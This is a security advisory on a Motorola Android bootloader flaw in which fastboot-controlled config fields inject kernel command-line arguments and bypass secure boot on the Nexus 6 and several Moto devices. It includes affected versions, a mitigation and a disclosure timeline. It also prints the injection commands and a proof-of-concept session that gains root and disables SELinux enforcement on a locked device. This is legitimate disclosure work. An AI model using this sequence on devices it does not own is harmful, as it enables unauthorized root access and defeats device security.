<--

Motorola Android Bootloader Kernel Cmdline Injection Secure Boot Bypass

Aleph Research Advisory

Identifier

Severity

Critical

Products

  1. Google Nexus 6

  2. Moto G5

  3. Moto G4

  4. Moto G5 Plus (community reported)

  5. Moto G4 Play XT1609 (community reported)

  6. Moto G4 Play XT1607 (community reported)

  7. Moto G3 (community reported)

  8. Moto G2 (community reported)

  9. Moto G XT1032 (community reported)

  10. Moto E CDMA (community reported)

  11. Other Motorola devices (unconfirmed)

Vulnerable Versions

  1. Nexus 6: N6F26Y and earlier.

  2. Moto G4: MPJ24.139-63, NPJ25.93-14, NPJS25.93-14.4, other unconfirmed

  3. Moto G5: NPP25.137-33, other unconfirmed

Mitigation

Install Android 7.1.1 N6F27C or later. (Nexus 6)

Technical Details

Motorola ABOOT (Applications Bootloader) contains several arguments that can be controlled through the fastboot interface, even if the bootloader is locked:

On Nexus 6:

$ fastboot oem config
[...]
(bootloader) <UTAG name="battery" protected="false">
(bootloader)   <value>
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     Battery detection control
(bootloader)     ("meter_lock" or "no_eprom")
(bootloader)   </description>
(bootloader) </UTAG>

(bootloader) <UTAG name="bootmode" protected="false">
(bootloader)   <value>
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     To force certain bootmode
(bootloader)     (valid values are "fastboot", "factory", "bp-tools", "q
(bootloader)     com", and "on-device-diag")
(bootloader)   </description>
(bootloader) </UTAG>

(bootloader) <UTAG name="carrier" protected="false">
(bootloader)   <value>
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     Carrier IDs, see http://goo.gl/lojLh3
(bootloader)   </description>
(bootloader) </UTAG>

(bootloader) <UTAG name="console" type="str" protected="false">
(bootloader)   <value>
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     Config kernel console log
(bootloader)       enable|true     - enable with default settings
(bootloader)       disable|false   - disable
(bootloader)       <config string> - enable with customized settings
(bootloader)       (e.g.: "ttyHSL0", "ttyHSL0,230400,n8")
(bootloader)   </description>
(bootloader) </UTAG>

(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.048s]
finished. total time: 0.048s

The fsg-id, carrier and console parameters can contain arbitrary values, which eventually propagate to the kernel command line. Now, if the bootloader didn’t sanitize these arguments, one could pass arbitrary kernel command line arguments:

$ fastboot oem config console "a foo=0 "
$ fastboot oem config fsg-id "a bar=1"
$ fastboot oem config carrier "a baz=2"

And indeed, in build N6F26Y and earlier:

shamu:/ $ dmesg | grep command
[    0.000000] Kernel command line: console=a foo=0 ,115200,n8 earlyprintk 
androidboot.console=a foo=0  androidboot.hardware=shamu msm_rtb.filter=0x37
ehci-hcd.park=3 utags.blkdev=/dev/block/platform/msm_sdcc.1/by-name/utags
utags.backup=/dev/block/platform/msm_sdcc.1/by-name/utagsBackup coherent_pool=8M
vmalloc=300M buildvariant=user androidboot.bootdevice=msm_sdcc.1 androidboot.serialno=ZX1G427V97
androidboot.baseband=mdm androidboot.version-baseband=D4.01-9625-05.45+FSG-9625-02.117
androidboot.mode=normal androidboot.device=shamu androidboot.hwrev=0x83A0
androidboot.radio=0x7 androidboot.powerup_reason=0x00004000 androidboot.bootreason=reboot
androidboot.write_protect=0 restart.download_mode=0 androidboot.fsg-id=a bar=1
androidboot.secure_hardware=1 androidboot.cid=0xDE androidboot.wifimacaddr=F8:CF:C5:9F:8F:EB
androidboot.btmacaddr=F8:CF:C5:9F:8F:EA mdss_mdp.panel=1:dsi:0:qcom,mdss_dsi_mot_smd_596_QHD_dualmipi0_cmd_v0
androidboot.bootloader=moto-apq8084-72.02 androidboot.carrier=a baz=2 androidboot.hard<

Proof-of-Concept

A root exploit for Nexus 6 is demonstrated. PoC is available at our GitHub research repo. The following shows a successful attack:

$ adb root
adbd cannot run as root in production builds

$ adb shell
shamu:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
shamu:/ $ getenforce
Enforcing
shamu:/ $ setenforce permissive
setenforce: Couldn't set enforcing status to 'permissive': Permission denied
shamu:/ $ reboot bootloader

$ fastboot getvar unlocked
[...]
unlocked: no
finished. total time: 0.008s

$ fastboot oem config fsg-id "a initrd=0x11000000,1518172"
[...]
(bootloader) <UTAG name="fsg-id" type="str" protected="false">
(bootloader)   <value>
(bootloader)     a initrd=0x11000000,1518172
(bootloader)   </value>
(bootloader)   <description>
(bootloader)     FSG IDs, see http://goo.gl/gPmhU
(bootloader)   </description>
(bootloader) </UTAG>

OKAY [  0.016s]
finished. total time: 0.016s

$ fastboot flash aleph malicious.cpio.gz
[...]
target reported max download size of 536870912 bytes
sending 'aleph' (1482 KB)...
OKAY [  0.050s]
writing 'aleph'...
(bootloader) Not allowed in LOCKED state!
FAILED (remote failure)
finished. total time: 0.054s

$ fastboot continue
[...]
resuming boot...
OKAY [  0.007s]
finished. total time: 0.007s

$ adb shell
shamu:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:su:s0
shamu:/ # getenforce
Enforcing
shamu:/ # setenforce permissive
shamu:/ # getenforce
Permissive
shamu:/ #

Timeline

  • 30-Aug-17
    : Added products (Moto G (XT1032)).
  • 11-Jul-17
    : Added products (Moto G4 Play (XT1607)).
  • 22-Jun-17
    : Added products (Moto E CDMA).
  • 13-Jun-17
    : Added products (Moto G2).
  • 12-Jun-17
    : Added products (Moto G3, Moto G4 Play (XT1609), Moto G5 Plus).
  • 07-Jun-17
    : Added products (Moto G4 & Moto G5).
  • 23-May-17
    : Public disclosure.
  • 01-May-17
    : Vendor advisory available (Android Security).
  • 01-Mar-17
    : Added as ALEPH-2017011.
  • 21-Dec-16
    : Reported (Android Security).

Posts

Credit

External References